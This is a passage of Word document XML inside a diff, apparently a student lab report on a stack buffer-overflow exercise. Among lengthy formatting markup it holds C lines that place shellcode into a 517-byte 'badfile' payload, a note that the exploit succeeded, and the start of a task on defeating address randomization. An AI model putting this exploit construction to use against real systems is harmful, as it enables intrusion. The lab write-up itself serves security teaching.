+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>// Part 2: Filled bytes (done)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>// Part 3: Shellcode</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>shellcodeSize</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>strlen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>shellcode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>shellcodeStart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>517</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>shellcodeSize</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>strcpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">buffer </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>shellcodeStart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> shellcode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">he successful execution and final version of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> were shown above.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>2.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Task </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Defeating Address Randomization</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Tu</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>rn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ed</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on the Ubuntu’s address randomization</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20E36045" wp14:editId="08AA8A59">
+            <wp:extent cx="5274310" cy="697230"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
+            <wp:docPr id="19" name="图片 19"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 7"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="697230"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
